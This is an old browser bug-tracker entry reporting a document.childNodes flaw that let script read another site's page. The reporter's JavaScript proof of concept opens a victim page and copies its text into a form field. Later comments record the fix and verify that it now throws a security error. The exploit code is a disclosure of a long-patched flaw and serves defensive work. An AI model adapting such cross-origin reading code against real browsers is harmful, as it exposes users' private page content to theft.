document.childNodes vulnerability

VERIFIED FIXED

Status

()

Core
Security
P3
normal
VERIFIED FIXED
19 years ago
19 years ago

People

(Reporter: joro, Assigned: Norris Boyd)

Tracking

Trunk
x86
Windows 95
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

19 years ago
document.childNodes allows access to arbitrary document, which allows at least
reading its content.
This bug is very similar to the document.firstChild bug.
The code is:
------------------------------------
function f(o)
{
 var s='';
 var i;
 s = o.nodeValue;
 if ( o.childNodes )
    for ( i = 0; i < o.childNodes.length; i++ )
       s += f(o.childNodes[i]);
return s;
}

a=window.open("http://www.yahoo.com","victim");

function g()
{
document.forms[0].elements[0].value=f(a.document.childNodes[0]);
}
setTimeout("g()",10000);
---------------------------------------
(Assignee)

Updated

19 years ago
Status: NEW → RESOLVED
Last Resolved: 19 years ago
Resolution: --- → FIXED
(Assignee)

Comment 1

19 years ago
This is fixed with my Friday night checkin of all.js.

Updated

19 years ago
QA Contact: junruh → dshea

Updated

19 years ago
Status: RESOLVED → VERIFIED

Comment 2

19 years ago
Windows NT 1999120208 Comm
Verified
...'[Exception... "Security error"'...

Comment 3

19 years ago
Bulk moving all Browser Security bugs to new Security: General component.  The 
previous Security component for Browser will be deleted.
Component: Security → Security: General
You need to log in before you can comment on or make changes to this bug.